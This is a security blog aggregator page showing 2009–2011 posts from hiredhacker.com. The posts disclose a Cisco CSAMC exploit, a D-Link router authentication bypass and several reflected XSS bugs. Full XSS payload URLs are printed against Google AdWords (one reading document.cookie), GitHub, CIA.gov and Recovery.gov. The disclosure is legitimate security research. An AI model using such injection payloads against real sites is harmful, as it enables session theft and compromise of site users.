My Security Planet » hiredhacker.com

Feeds

13170 items (0 unread) in 75 feeds

• Jeremy Zawodny's blog
• Mozilla Webdev
• Transcendental Technical Travails
• Ian Bicking: a blog
• Hackosis

WebSecurity

• Watchfire Application Security Insider
• BlogSecurity
• sirdarckcat
• Google Online Security Blog
• CGISecurity.com: Your Web Site and Application Security Resource
• Switch/Twitch
• mybeNi websecurity
• cat slave diary
• SecuriTeam Blogs
• Curiouser and Curiouser
• Alex's Corner
• Billy (BK) Rios
• Chris Shiflett
• christian's weblog
• funkatron.com
• GNUCITIZEN
• The Spanner
• hackademix.net
• Ruby on Rails Security Project
• It's a shampoo world anyway
• Web Security Blog
• ha.ckers.org web application security lab
• Yet Another Infosec Blog
• PHP Security Blog
• Security Thoughts
• Sunnet Beskerming Security Advisories
• Disenchant's Blog
• Sylvan von Stuppe
• Larholm.com
• The Turkey Curse
• Jeremiah Grossman
• Anurag Agarwal - Application Security Evangelist
• Ivan Ristic
• deep inside | security & tools
• omg.wtf.bbq.
• BlueHat Security Briefings
• Tactical Web Application Security
• .:Computer Defense:.

Security

• tssci security
• Plynt Penetration Testing Blog
• Michael Howard's Web Log
• Security Retentive
• BindShell.Net
• Dominic White's .tHE pRODUCT
• SecurityFocus News
• Justice League
• Schneier on Security
• Rational Survivability
• terminal23
• 1 Raindrop
• hiredhacker.com
• Matasano Chargen
• Security Vulnerability Research & Defense
• Michael on Security - Musings on Information Security
• Fortify blog
• The Art of Software Security Assessment
• GDS Security Blog
• Vodun.org
• Robert Penz Blog
• Mark Curphey - SecurityBuddha.com
• Liminal states
• Security Ripcord
• ModSecurity Blog
• IBM Internet Security Systems Frequency X Blog
• Suspekt...
• extern blog SensePost;
• Zero in a bit

SEO

• SEO BlackHat: Black Hat SEO Blog
• busin3ss.name

Tools

• Opensourcetesting.org News

hiredhacker.com

• 

  Cisco Security Agent Management Console ‘st_upload’ Exploit.

  Posted: April 7th, 2011, 12:31am CDT by Gerry Eisenhaur

  Tags:    [edit]

  Here is my proof-of-concept exploit for the Cisco Security Agent Management st_upload Remote Code Execution Vulnerability (ZDI-11-088) I reported to ZDI a little while back. CVE ID: CVE-2011-0364
• 

  Getting schooled in rummy.

  Posted: March 6th, 2011, 11:58pm CST by Gerry Eisenhaur

  Tags:    [edit]

  My wife and I are playing a “never ending” game of rummy and being the geek I am, I decided to keep track of our game play so we can chart our progress. Needless to say my wife is kicking my ass and now its public for all to see. Luckily, I have time for [...]
• 

  Random XSS

  Posted: January 4th, 2011, 8:12pm CST by Gerry Eisenhaur

  Tags:    [edit]

  I have a bad habit of saving these little random bugs and telling myself that I ‘may have a need for them later’. I think thats just the paranoid security guy in me, but then again I do the same for random little electronic parts I find. Given the fact I just cleaned out all [...]
• 

  Using Python and PEFile to Extract Embedded Code

  Posted: January 4th, 2011, 7:44pm CST by Gerry Eisenhaur

  Tags:    [edit]

  I’ve been cleaning old code again and I think it’s been long enough that I can release this now. I used it to extract code that was embedded within the Cisco Security Agent Management Console (CSAMC). Hopefully someone will find it useful.
• 

  Google Adsense XSS

  Posted: January 4th, 2011, 7:26pm CST by Gerry Eisenhaur

  Tags:    [edit]

  Not sure when this got reported or fixed, but I guess I missed the reward by a day. https://adwords.google.com/cm/CampaignMgmt?__u=1111111111&__c=1111111111&stylePrefOverride=2',0);alert(document.cookie)//
• 

  Old FiOS WEP Key Trick

  Posted: May 4th, 2010, 8:21pm CDT by Gerry Eisenhaur

  Tags:    [edit]

  Started cleaning out some old code and found this. It was a quick little trick to decrypt (some) FiOS WEP keys, not sure if it still works.
• 

  D-Link DIR-615 Remote Exploit

  Posted: December 15th, 2009, 12:55pm CST by Gerry Eisenhaur

  Tags:    [edit]

  D-Link’s DIR-615 Wireless N Router (http://www.dlink.com/products/?pid=565) contains a flaw that allows attackers to access administrative functions without authorization. By simply requesting a certain URL, this vulnerability can be used to perform numerous attacks including changing the admin password, disabling wireless security, and changing DNS settings. The hole is confirmed in firmware version 3.10NA. Example (changes [...]
• 

  GitHub XSS

  Posted: December 15th, 2009, 12:29pm CST by Gerry Eisenhaur

  Tags:    [edit]

  http://github.com/search?q=python&type=Everything&repo='"><script>alert(/pwned/)</script>
• 

  CIA.gov and Recovery.gov XSS

  Posted: December 15th, 2009, 12:24pm CST by Gerry Eisenhaur

  Tags:    [edit]

  https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/) http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=<script>alert('and pwned again')</script>&error=<script>alert('pwned')</script>
• 

  Google Wave Invites

  Posted: December 12th, 2009, 7:57am CST by Gerry Eisenhaur

  Tags:    [edit]

  More Google Wave invites, who wants em?